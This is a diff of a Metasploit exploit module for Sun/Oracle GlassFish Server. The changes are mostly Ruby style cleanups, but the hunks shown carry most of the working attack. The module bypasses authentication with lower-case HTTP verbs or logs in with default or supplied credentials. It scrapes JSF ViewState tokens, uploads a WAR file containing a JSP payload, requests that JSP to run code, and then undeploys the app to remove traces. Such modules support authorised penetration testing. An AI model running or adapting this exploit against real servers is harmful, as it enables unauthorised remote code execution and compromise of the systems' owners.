@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "Sun/Oracle GlassFish Server Authenticated Code Execution",
+        'Name' => 'Sun/Oracle GlassFish Server Authenticated Code Execution',
         'Description' => %q{
           This module logs in to a GlassFish Server (Open Source or Commercial) using various
           methods (such as authentication bypass, default credentials, or user-supplied login),
@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['OSVDB', '71948'],
           ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
         ],
-        'Platform' => ['win', 'linux', 'java'],
         'Targets' => [
           [ 'Automatic', {} ],
           [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
@@ -61,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APP_RPORT', [ true, 'The Application interface port', '8080']),
         OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ]),
-        OptString.new('TARGETURI', [ true, "The URI path of the GlassFish Server", '/']),
+        OptString.new('TARGETURI', [ true, 'The URI path of the GlassFish Server', '/']),
         OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
       ]
     )
@@ -83,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => path,
       'method' => method,
       'data' => data,
-      'headers' => headers,
+      'headers' => headers
     })
 
     unless res
@@ -97,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Return target
   #
   def auto_target(session, res, version)
-    print_status("Attempting to automatically select a target...")
+    print_status('Attempting to automatically select a target...')
 
     res = query_serverinfo(session, version)
     return nil unless res
@@ -126,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ln.chomp!
       case ln
       when /os\.name = (.*)/
-        os = $1
+        os = ::Regexp.last_match(1)
         case os
         when /Windows/
           return 'win'
@@ -149,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ln.chomp!
       case ln
       when /os\.arch = (.*)/
-        ar = $1
+        ar = ::Regexp.last_match(1)
         case ar
         when 'x86', 'i386', 'i686'
           return ARCH_X86
@@ -167,14 +166,14 @@ class MetasploitModule < Msf::Exploit::Remote
     res = ''
 
     if version == '2.x' || version == '9.x'
-      path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
+      path = '/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report'
       res = send_glassfish_request(path, @verbs['GET'], session)
     else
-      path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
+      path = '/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report'
       res = send_glassfish_request(path, @verbs['GET'], session)
 
       if !res || res.code != 200 || res.body.to_s !~ /Operating System Information/
-        path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
+        path = '/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server'
         res = send_glassfish_request(path, @verbs['GET'], session)
       end
     end
@@ -196,22 +195,22 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_glassfish_request(path, @verbs['GET'], session)
 
       if !res || res.code != 200
-        print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
+        print_error("Failed (#{res.code}): Error requesting #{path}")
         return nil
       end
 
-      input_id = "javax.faces.ViewState"
+      input_id = 'javax.faces.ViewState'
       p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(j_id\d+:j_id\d+)"/
       viewstate = res.body.scan(p)[0][0]
 
       entry = nil
-      p = /<a id="(.*)col1:link" href="\/applications\/webApplicationsEdit.jsf.*appName=(.*)">/
+      p = %r{<a id="(.*)col1:link" href="/applications/webApplicationsEdit.jsf.*appName=(.*)">}
       results = res.body.scan(p)
 
       results.each do |hit|
         if hit[1] =~ /^#{app}/
           entry = hit[0]
-          entry << "col0:select"
+          entry << 'col0:select'
         end
       end
 
@@ -220,29 +219,29 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_glassfish_request(path, @verbs['GET'], session)
 
       if !res || res.code != 200
-        print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
+        print_error("Failed (#{res.code}): Error requesting #{path}")
         return nil
       end
 
       viewstate = get_viewstate(res.body)
 
       entry = nil
-      p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
+      p = %r{<a id="(.*)col1:link" href="/common/applications/applicationEdit.jsf.*appName=(.*)">}
       results = res.body.scan(p)
 
       results.each do |hit|
         if hit[1] =~ /^#{app}/
           entry = hit[0]
-          entry << "col0:select"
+          entry << 'col0:select'
         end
       end
     end
 
     if !viewstate
-      print_error("Failed: Error getting ViewState")
+      print_error('Failed: Error getting ViewState')
       return nil
     elsif !entry
-      print_error("Failed: Error getting the entry to delete")
+      print_error('Failed: Error getting the entry to delete')
     end
 
     return viewstate, entry
@@ -254,20 +253,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def undeploy(viewstate, session, entry)
     # Send undeployment request
     data = [
-      "propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
-      "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
+      'propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=',
+      '&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false',
       "&#{Rex::Text.uri_encode(entry)}=true",
-      "&propertyForm%3AhelpKey=ref-applications.html",
-      "&propertyForm_hidden=propertyForm_hidden",
+      '&propertyForm%3AhelpKey=ref-applications.html',
+      '&propertyForm_hidden=propertyForm_hidden',
       "&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
-      "&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-      "&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-      "&javax.faces.partial.execute=%40all",
-      "&javax.faces.partial.render=%40all",
-      "&bare=true",
-      "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
-      "&javax.faces.partial.ajax=true"
-    ].join()
+      '&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1',
+      '&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1',
+      '&javax.faces.partial.execute=%40all',
+      '&javax.faces.partial.render=%40all',
+      '&bare=true',
+      '&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1',
+      '&javax.faces.partial.ajax=true'
+    ].join
 
     path = '/common/applications/applications.jsf'
     ctype = 'application/x-www-form-urlencoded'
@@ -275,10 +274,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
     if !res
       print_error("Undeployment failed on #{path} - No Response")
-    else
-      if res.code < 200 || res.code >= 300
-        print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
-      end
+    elsif res.code < 200 || res.code >= 300
+      print_error("Undeployment failed on #{path} - #{res.code}:#{res.message}")
     end
   end
 
@@ -286,7 +283,7 @@ class MetasploitModule < Msf::Exploit::Remote
     report_note(
       host: rhost,
       type: 'glassfish.banner',
-      data: { :banner => banner },
+      data: { banner: banner },
       update: :unique_data
     )
   end
@@ -309,16 +306,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Set version.  Some GlassFish servers return banner "GlassFish v3".
     if banner =~ /(GlassFish Server|Open Source Edition) {1,}(\d\.\d)/
-      version = $2
+      version = ::Regexp.last_match(2)
     elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
-      version = $1
+      version = ::Regexp.last_match(1)
     elsif banner =~ /Sun GlassFish Enterprise Server v2/ && version == 'Unknown'
       version = '2.x'
     elsif banner =~ /Sun Java System Application Server 9/ && version == 'Unknown'
       version = '9.x'
     end
 
-    if version == nil || version == 'Unknown'
+    if version.nil? || version == 'Unknown'
       print_status("Unsupported version: #{banner}")
     end
 
@@ -330,7 +327,7 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   # Return the formatted version of the POST data
   #
-  def format_2_x_war(boundary, name, value = nil, war = nil)
+  def format_2_x_war(boundary, name, _value = nil, war = nil)
     data = ''
 
     data << boundary
@@ -381,57 +378,57 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if version == '3.0'
 
-      uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
-      uploadparam_data = "form:sheet1:section1:prop1:fileupload"
+      uploadParam_name = 'form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam'
+      uploadparam_data = 'form:sheet1:section1:prop1:fileupload'
 
       boundary = "--#{boundary}"
 
       data = [
         format(boundary, app_base, nil, war),
         format(boundary, uploadParam_name, uploadparam_data),
-        format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
-        format(boundary, "form:sheet1:section1:prop1:action", "client"),
-        format(boundary, typefield, "war"),
-        format(boundary, "form:war:psection:cxp:ctx", app_base),
-        format(boundary, "form:war:psection:nameProp:appName", app_base),
-        format(boundary, "form:war:psection:vsProp:vs", ""),
-        format(boundary, status_checkbox, "true"),
-        format(boundary, "form:war:psection:librariesProp:library", ""),
-        format(boundary, "form:war:psection:descriptionProp:description", ""),
-        format(boundary, "form_hidden", "form_hidden"),
-        format(boundary, "javax.faces.ViewState", viewstate),
+        format(boundary, 'form:sheet1:section1:prop1:extension', '.war'),
+        format(boundary, 'form:sheet1:section1:prop1:action', 'client'),
+        format(boundary, typefield, 'war'),
+        format(boundary, 'form:war:psection:cxp:ctx', app_base),
+        format(boundary, 'form:war:psection:nameProp:appName', app_base),
+        format(boundary, 'form:war:psection:vsProp:vs', ''),
+        format(boundary, status_checkbox, 'true'),
+        format(boundary, 'form:war:psection:librariesProp:library', ''),
+        format(boundary, 'form:war:psection:descriptionProp:description', ''),
+        format(boundary, 'form_hidden', 'form_hidden'),
+        format(boundary, 'javax.faces.ViewState', viewstate),
         "#{boundary}--"
-      ].join()
+      ].join
     elsif version == '2.x' || version == '9.x'
 
-      uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
-      uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"
+      uploadParam_name = 'form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam'
+      uploadParam_data = 'form:title:sheet1:section1:prop1:fileupload'
 
-      focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
+      focusElementId_name = 'com_sun_webui_util_FocusManager_focusElementId'
       focusElementId_data = 'form:title:topButtons:uploadButton'
 
       boundary = "-----------------------------#{boundary}"
 
       data = [
         format_2_x_war(boundary, app_base, nil, war),
-        format(boundary, "form:title:sheet1:section1:type:appType", "webApp"),
-        format(boundary, "uploadRdBtn", "client"),
+        format(boundary, 'form:title:sheet1:section1:type:appType', 'webApp'),
+        format(boundary, 'uploadRdBtn', 'client'),
         format(boundary, uploadParam_name, uploadParam_data),
-        format(boundary, "form:title:sheet1:section1:prop1:extension", ".war"),
-        format(boundary, "form:title:ps:psec:nameProp:appName", app_base),
-        format(boundary, "form:title:ps:psec:cxp:ctx", app_base),
-        format(boundary, "form:title:ps:psec:vsp:vs", ""),
-        format(boundary, status_checkbox, "true"),
-        format(boundary, "form:title:ps:psec:librariesProp:library", ""),
-        format(boundary, "form:title:ps:psec:threadpoolProp:threadPool", ""),
-        format(boundary, "form:title:ps:psec:registryProp:registryType", ""),
-        format(boundary, "form:title:ps:psec:descriptionProp:description", ""),
-        format(boundary, "form:helpKey", "uploaddev.html"),
-        format(boundary, "form_hidden", "form_hidden"),
-        format(boundary, "javax.faces.ViewState", viewstate),
+        format(boundary, 'form:title:sheet1:section1:prop1:extension', '.war'),
+        format(boundary, 'form:title:ps:psec:nameProp:appName', app_base),
+        format(boundary, 'form:title:ps:psec:cxp:ctx', app_base),
+        format(boundary, 'form:title:ps:psec:vsp:vs', ''),
+        format(boundary, status_checkbox, 'true'),
+        format(boundary, 'form:title:ps:psec:librariesProp:library', ''),
+        format(boundary, 'form:title:ps:psec:threadpoolProp:threadPool', ''),
+        format(boundary, 'form:title:ps:psec:registryProp:registryType', ''),
+        format(boundary, 'form:title:ps:psec:descriptionProp:description', ''),
+        format(boundary, 'form:helpKey', 'uploaddev.html'),
+        format(boundary, 'form_hidden', 'form_hidden'),
+        format(boundary, 'javax.faces.ViewState', viewstate),
         format(boundary, focusElementId_name, focusElementId_data),
         "#{boundary}--"
-      ].join()
+      ].join
     else
 
       boundary = "-----------------------------#{boundary}"
@@ -441,11 +438,6 @@ class MetasploitModule < Msf::Exploit::Remote
       num2 = num1 + 14
       num3 = num2 + 2
       num4 = num3 + 2
-      num5 = num4 + 2
-      num6 = num5 + 2
-      num7 = num6 + 1
-
-      id0 = num4
       id1 = num4 + 1
       id2 = num4 + 2
       id3 = num4 + 3
@@ -456,81 +448,81 @@ class MetasploitModule < Msf::Exploit::Remote
       id8 = num4 + 8
       id9 = num4 + 9
 
-      uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
-      uploadParam_value = "form:sheet1:section1:prop1:fileupload"
+      uploadParam_name = 'form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam'
+      uploadParam_value = 'form:sheet1:section1:prop1:fileupload'
 
-      focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
-      focusElementId_data = "form:title2:bottomButtons:uploadButton"
+      focusElementId_name = 'com_sun_webui_util_FocusManager_focusElementId'
+      focusElementId_data = 'form:title2:bottomButtons:uploadButton'
 
       data = [
-        format(boundary, "uploadRdBtn", "client"),
+        format(boundary, 'uploadRdBtn', 'client'),
         ## web service
         format(boundary, app_base, nil, war),
         ## sheet1
         format(boundary, uploadParam_name, uploadParam_value),
-        format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
-        format(boundary, "form:sheet1:section1:prop1:action", "client"),
-        format(boundary, "form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType", "war"),
-        format(boundary, "form:appClient:psection:nameProp:appName", "#{app_base}"),
-        format(boundary, "form:appClient:psection:descriptionProp:description"),
+        format(boundary, 'form:sheet1:section1:prop1:extension', '.war'),
+        format(boundary, 'form:sheet1:section1:prop1:action', 'client'),
+        format(boundary, "form:sheet1:sun_propertySheetSection#{num1}:type:appType", 'war'),
+        format(boundary, 'form:appClient:psection:nameProp:appName', "#{app_base}"),
+        format(boundary, 'form:appClient:psection:descriptionProp:description'),
         ## war
-        format(boundary, "form:war:psection:cxp:ctx", "#{app_base}"),
-        format(boundary, "form:war:psection:nameProp:appName", "#{app_base}"),
-        format(boundary, "form:war:psection:vsProp:vs"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id1.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id2.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id3.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id4.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id5.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id6.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id7.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id8.to_s, "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox" + id9.to_s, "true"),
-        format(boundary, "form:other:psection:descriptionProp:description", ""),
-        format(boundary, "form:other:psection:librariesProp:library", ""),
-        format(boundary, "form:other:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:other:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:other:psection:enableProp:sun_checkbox44", "true"),
-        format(boundary, "form:war:psection:enableProp:sun_checkbox42", "true"),
-        format(boundary, "form:other:psection:vsProp:vs", ""),
-        format(boundary, "form:rar:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:rar:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:rar:psection:enableProp:sun_checkbox40", "true"),
-        format(boundary, "form:other:psection:nameProp:appName", app_base),
-        format(boundary, "form:rar:psection:nameProp:appName", app_base),
-        format(boundary, "form:jar:psection:nameProp:appName", app_base),
-        format(boundary, "form:ear:psection:nameProp:appName", app_base),
-        format(boundary, "form:ear:psection:descriptionProp:description", ""),
-        format(boundary, "form:jar:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:jar:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:ear:psection:jw:jwc", "true"),
-        format(boundary, "form:ear:psection:vsProp:vs", ""),
-        format(boundary, "form:appClient:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:jar:psection:enableProp:sun_checkbox38", "true"),
-        format(boundary, "form:jar:psection:descriptionProp:description", ""),
-        format(boundary, "form:ear:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:appClient:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:ear:psection:enableProp:sun_checkbox36", "true"),
-        format(boundary, "form:war:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:jar:psection:librariesProp:library", ""),
-        format(boundary, "form:appClient:psection:jw:jwt", "true"),
-        format(boundary, "form:ear:psection:librariesProp:library", ""),
-        format(boundary, "form:sheet1:sun_propertySheetSection23:type:appType", "war"),
-        format(boundary, "form:ear:psection:deploymentOrder:deploymentOrder", ""),
-        format(boundary, "form:rar:psection:descriptionProp:description", ""),
-        format(boundary, "form:war:psection:implicitCdi:implicitCdi", "true"),
-        format(boundary, "form:war:psection:librariesProp:library"),
-        format(boundary, "form:war:psection:descriptionProp:description"),
-        format(boundary, "form_hidden", "form_hidden"),
-        format(boundary, "javax.faces.ViewState", "#{viewstate}"),
+        format(boundary, 'form:war:psection:cxp:ctx', "#{app_base}"),
+        format(boundary, 'form:war:psection:nameProp:appName', "#{app_base}"),
+        format(boundary, 'form:war:psection:vsProp:vs'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id1.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id2.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id3.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id4.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id5.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id6.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id7.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id8.to_s, 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox' + id9.to_s, 'true'),
+        format(boundary, 'form:other:psection:descriptionProp:description', ''),
+        format(boundary, 'form:other:psection:librariesProp:library', ''),
+        format(boundary, 'form:other:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:other:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:other:psection:enableProp:sun_checkbox44', 'true'),
+        format(boundary, 'form:war:psection:enableProp:sun_checkbox42', 'true'),
+        format(boundary, 'form:other:psection:vsProp:vs', ''),
+        format(boundary, 'form:rar:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:rar:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:rar:psection:enableProp:sun_checkbox40', 'true'),
+        format(boundary, 'form:other:psection:nameProp:appName', app_base),
+        format(boundary, 'form:rar:psection:nameProp:appName', app_base),
+        format(boundary, 'form:jar:psection:nameProp:appName', app_base),
+        format(boundary, 'form:ear:psection:nameProp:appName', app_base),
+        format(boundary, 'form:ear:psection:descriptionProp:description', ''),
+        format(boundary, 'form:jar:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:jar:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:ear:psection:jw:jwc', 'true'),
+        format(boundary, 'form:ear:psection:vsProp:vs', ''),
+        format(boundary, 'form:appClient:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:jar:psection:enableProp:sun_checkbox38', 'true'),
+        format(boundary, 'form:jar:psection:descriptionProp:description', ''),
+        format(boundary, 'form:ear:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:appClient:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:ear:psection:enableProp:sun_checkbox36', 'true'),
+        format(boundary, 'form:war:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:jar:psection:librariesProp:library', ''),
+        format(boundary, 'form:appClient:psection:jw:jwt', 'true'),
+        format(boundary, 'form:ear:psection:librariesProp:library', ''),
+        format(boundary, 'form:sheet1:sun_propertySheetSection23:type:appType', 'war'),
+        format(boundary, 'form:ear:psection:deploymentOrder:deploymentOrder', ''),
+        format(boundary, 'form:rar:psection:descriptionProp:description', ''),
+        format(boundary, 'form:war:psection:implicitCdi:implicitCdi', 'true'),
+        format(boundary, 'form:war:psection:librariesProp:library'),
+        format(boundary, 'form:war:psection:descriptionProp:description'),
+        format(boundary, 'form_hidden', 'form_hidden'),
+        format(boundary, 'javax.faces.ViewState', "#{viewstate}"),
         format(boundary, focusElementId_name, focusElementId_data)
-      ].join()
+      ].join
 
-      item_list_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"
-      item_list_data = "|server|com.sun.webui.jsf.separator|"
+      item_list_name = 'form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list'
+      item_list_data = '|server|com.sun.webui.jsf.separator|'
 
-      item_value_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"
-      item_value_data = "server"
+      item_value_name = 'form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value'
+      item_value_data = 'server'
 
       data << format(boundary, item_list_name, item_list_data)
       data << format(boundary, item_value_name, item_value_data)
@@ -569,7 +561,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version = opts[:version]
 
     if version == '2.x' || version == '9.x'
-      path = "/applications/upload.jsf?appType=webApp"
+      path = '/applications/upload.jsf?appType=webApp'
       res = send_glassfish_request(path, @verbs['GET'], session)
 
       # Obtain some properties
@@ -578,12 +570,12 @@ class MetasploitModule < Msf::Exploit::Remote
       status_checkbox = res.body.scan(p2)[0][0]
       boundary = rand_text_alphanumeric(28)
     else
-      path = "/common/applications/uploadFrame.jsf"
+      path = '/common/applications/uploadFrame.jsf'
       res = send_glassfish_request(path, @verbs['GET'], session)
 
       # Obtain some properties
       res.body =~ /propertySheetSection(\d{3})/
-      start = $1
+      start = ::Regexp.last_match(1)
       p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
       p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
 
@@ -607,14 +599,14 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     post_data = get_upload_data({
-      :boundary => boundary,
-      :version => version,
-      :war => war,
-      :app_base => app_base,
-      :typefield => typefield,
-      :status_checkbox => status_checkbox,
-      :start => start,
-      :viewstate => viewstate
+      boundary: boundary,
+      version: version,
+      war: war,
+      app_base: app_base,
+      typefield: typefield,
+      status_checkbox: status_checkbox,
+      start: start,
+      viewstate: viewstate
     })
 
     # Upload our payload
@@ -630,7 +622,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Print upload result
     if res && res.code == 302
-      print_good("Successfully Uploaded")
+      print_good('Successfully Uploaded')
     else
       print_error("Error uploading #{res.code}")
       return
@@ -641,17 +633,17 @@ class MetasploitModule < Msf::Exploit::Remote
     nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
                                            {
                                              'Msf' => framework,
-                                             'MsfExploit' => self,
+                                             'MsfExploit' => self
                                            })
 
     print_status("Executing #{jsp_path}...")
     req = nclient.request_raw({
       'uri' => jsp_path,
-      'method' => 'GET',
+      'method' => 'GET'
     })
 
     if req
-      res = nclient.send_recv(req, 90)
+      nclient.send_recv(req, 90)
     else
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
     end
@@ -660,18 +652,18 @@ class MetasploitModule < Msf::Exploit::Remote
     select(nil, nil, nil, 5)
 
     # Start undeploying
-    print_status("Getting information to undeploy...")
+    print_status('Getting information to undeploy...')
     viewstate, entry = get_delete_info(session, version, app_base)
     if !viewstate
-      fail_with(Failure::Unknown, "Unable to get viewstate")
-    elsif (not entry)
-      fail_with(Failure::Unknown, "Unable to get entry")
+      fail_with(Failure::Unknown, 'Unable to get viewstate')
+    elsif (!entry)
+      fail_with(Failure::Unknown, 'Unable to get entry')
     end
 
     print_status("Undeploying #{app_base}...")
     undeploy(viewstate, session, entry)
 
-    print_status("Undeployment complete.")
+    print_status('Undeployment complete.')
   end
 
   def init_loginscanner
@@ -695,7 +687,7 @@ class MetasploitModule < Msf::Exploit::Remote
       host: rhost,
       port: rport,
       proto: 'tcp',
-      refs: self.references
+      refs: references
     )
   end
 
@@ -703,7 +695,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sid = nil
 
     if version == '2.x' || version == '9.x'
-      print_status("Trying auth bypass...")
+      print_status('Trying auth bypass...')
       res = send_glassfish_request('/applications/upload.jsf', 'get')
       title = '<title>Deploy Enterprise Applications/Modules</title>'
       if res && res.code.to_i == 200 && res.body.include?(title)
@@ -711,7 +703,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     else
       # 3.0
-      print_status("Trying auth bypass...")
+      print_status('Trying auth bypass...')
       res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
       title = '<title>Deploy Applications or Modules'
       if res && res.code.to_i == 200 && res.body.include?(title)
@@ -725,11 +717,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def my_target_host
-    "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
+    "http://#{rhost}:#{rport}#{normalize_uri(target_uri.path)}"
   end
 
   def service_details
-    super.merge({ post_reference_name: self.refname })
+    super.merge({ post_reference_name: refname })
   end
 
   def try_normal_login(version)
@@ -795,10 +787,10 @@ class MetasploitModule < Msf::Exploit::Remote
     app_base = rand_text_alphanumeric(4 + rand(32 - 4))
 
     war = p.encoded_war({
-      :app_name => app_base,
-      :jsp_name => jsp_name,
-      :arch => selected_target.arch,
-      :platform => selected_target.platform
+      app_name: app_base,
+      jsp_name: jsp_name,
+      arch: selected_target.arch,
+      platform: selected_target.platform
     }).to_s
 
     return app_base, jsp_name, war
@@ -819,27 +811,27 @@ class MetasploitModule < Msf::Exploit::Remote
     # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
     @verbs = {
       'GET' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
-      'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
+      'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST'
     }
 
     sid = attempt_login(version)
 
     unless sid
-      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate")
+      fail_with(Failure::NoAccess, "#{my_target_host} - GlassFish - Failed to authenticate")
     end
 
     selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
-    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
+    fail_with(Failure::NoTarget, 'Unable to automatically select a target') unless selected_target
 
     app_base, jsp_name, war = make_war(selected_target)
-    print_status("Uploading payload...")
-    res = upload_exec({
-      :session => sid,
-      :app_base => app_base,
-      :jsp_name => jsp_name,
-      :war => war,
-      :edition => edition,
-      :version => version
+    print_status('Uploading payload...')
+    upload_exec({
+      session: sid,
+      app_base: app_base,
+      jsp_name: jsp_name,
+      war: war,
+      edition: edition,
+      version: version
     })
   end
 end
